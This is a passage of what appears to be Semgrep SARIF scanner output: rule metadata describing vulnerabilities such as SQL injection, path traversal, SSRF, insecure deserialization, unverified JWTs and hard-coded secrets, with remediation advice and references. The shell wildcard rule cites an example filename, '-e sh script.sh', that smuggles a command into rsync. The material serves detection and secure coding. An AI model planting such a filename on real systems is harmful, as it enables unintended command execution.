user_input)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","id":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","name":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"help":{"markdown":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse)\n - [https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss](https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss)\n","text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse","id":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","name":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.request-data-fileresponse.request-data-fileresponse"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"help":{"markdown":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected)\n - [https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt](https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)\n","text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","id":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","name":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","properties":{"precision":"very-high","tags":["CWE-155: Improper Neutralization of Wildcards or Matching Symbols","LOW CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.system-wildcard-detected.system-wildcard-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","id":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","name":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","id":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","name":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"help":{"markdown":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4)\n - [https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms](https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","id":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","name":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","id":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","name":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"help":{"markdown":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n","text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","id":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","name":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet](https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint)\n - [https://docs.rs/reqwest/latest/reqwest/](https://docs.rs/reqwest/latest/reqwest/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint","id":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","name":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.ssrf.reqwest-taint.reqwest-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","id":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","name":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"help":{"markdown":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","id":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","name":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","id":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","name":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"help":{"markdown":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges)\n - [https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges","id":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","name":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.no-new-privileges.no-new-privileges"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","id":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","name":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"help":{"markdown":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)\n","text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS 